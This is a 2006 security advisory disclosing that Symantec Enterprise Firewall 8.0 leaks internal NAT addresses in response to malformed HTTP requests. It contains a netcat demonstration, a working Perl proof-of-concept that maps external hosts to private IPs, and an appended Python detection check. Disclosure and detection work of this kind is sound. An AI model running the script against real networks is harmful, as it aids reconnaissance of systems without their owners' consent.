Symantec Enterprise Firewall NAT/HTTP

SEC-CONSULT Security Advisory 20060512-0

===========================================================================

title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure

program: Symantec Enterprise FW

vulnerable version: 8.0

homepage: www.symantec.com

found: 2005-09-13

by: SEC Consult / www.sec-consult.com

===========================================================================

 

Vendor description:

---------------

 

Symantec's Enterprise Firewall provides complete network protection by integrating smart application-level proxies, network circuits and packet filtering into a special perimeter-security architecture (...)

 

 

Vulnerability overview:

---------------

 

Symantec Enterprise Firewall leaks the internal IP addresses of NATed machines in response to certain malformed HTTP requests.

 

 

Vulnerability details:

---------------

 

A request of the form "get/XX HTTP/1.0" (note the missing space between the method and the path) triggers the exposure. The firewall appears to forward the request and wait for a reply from the web server until its timeout is reached. The final response from the firewall looks like:

 

df0rm@b4byl0n:~> netcat www.behind-raptor.com 80

get/01 http/1.0

HTTP/1.1 504 Gateway Timeout

MIME-Version: 1.0

Server: Simple, Secure Web Server 1.1

Date: Tue, 13 Sep 2005 06:23:32 GMT

Connection: close

Content-Type: text/html

 

[...]

 

The request seen by the firewall was:

  10.238.94.57/01

Here's a simple script to map external to internal IPs.

---------------

#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot] com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use IO::Socket;

$| = 1;

$host = $ARGV[0] or die "$0 <host>\n";
# method and path fused into one token, the shape the proxy rewrites
# instead of rejecting
$request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
);
die "could not open socket: $!\n" unless $sock;

print $sock $request;
print "waiting for timeout (this can take about 1 min.)\n";

# the proxy's timeout page echoes the rewritten URL, including the
# internal address of the NATed server
while (<$sock>) {
    if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
        $ip = $1;
    }
}

if (defined($ip)) {
    print "$host: $ip\n";
} else {
    print "failed.\n";
}

close($sock);

vendor status:
---------------
vendor notified: 2005-09-13
vendor response: 2005-09-13
patch available: 2005-12

General remarks
---------------
We would like to apologize in advance for potential nonconformities and/or known issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com

EOF SEC Consult / @2006
research at sec-consult dot com
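Added detection example, not part of the SEC Consult advisory or of the script above: a Python check that flags request lines of the fused method/path shape ("get/01 http/1.0") as a proxy log records them, and that scans a proxy's error page for RFC 1918 addresses, which is how a defender verifies that the leak is closed after patching. The request lines and the 504 body are constructed samples (the advisory elides the body), and the function names are assumptions.

```python
import ipaddress
import re

# A method is a plain token of letters; a "/" inside it is the advisory's fused
# method/path shape.  A well-formed request line is METHOD SP target SP HTTP/x.y.
_METHOD_RE = re.compile(r"^[A-Za-z]+$")
_IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def classify_request_line(line):
    """'ok', 'fused-method' (e.g. "get/01 http/1.0") or 'malformed'."""
    parts = line.strip().split()
    if len(parts) < 2 or not parts[-1].lower().startswith("http/"):
        return "malformed"
    method = parts[0]
    if len(parts) == 3 and _METHOD_RE.match(method):
        return "ok"
    # Two tokens whose first is letters + "/" + path: the method is glued to
    # the path.  The proxy forwarded this instead of answering 400; flag it.
    if (len(parts) == 2 and "/" in method
            and _METHOD_RE.match(method.split("/", 1)[0])):
        return "fused-method"
    return "malformed"

def leaked_private_ips(response):
    """RFC 1918 addresses found anywhere in a proxy response, in order."""
    found = []
    for m in _IPV4_RE.finditer(response):
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:  # octet out of range, e.g. 999.1.1.1
            continue
        if any(ip in net for net in _RFC1918) and str(ip) not in found:
            found.append(str(ip))
    return found

# Constructed samples (not from the advisory): request lines as a proxy log
# records them, and a 504 page whose body echoes the rewritten internal URL.
SAMPLE_REQUEST_LINES = [
    "GET /index.html HTTP/1.0",
    "get/01 http/1.0",
    "getXXX/XXX HTTP/1.0",
    "GET HTTP/1.0",
]
SAMPLE_RESPONSE = (
    "HTTP/1.1 504 Gateway Timeout\r\nContent-Type: text/html\r\n\r\n"
    "<html>No reply from http://10.238.94.57XXX/XXX before timeout.</html>"
)
```

Run `leaked_private_ips` over the body of every 5xx page your proxy emits; a non-empty result means the proxy still echoes the translated address.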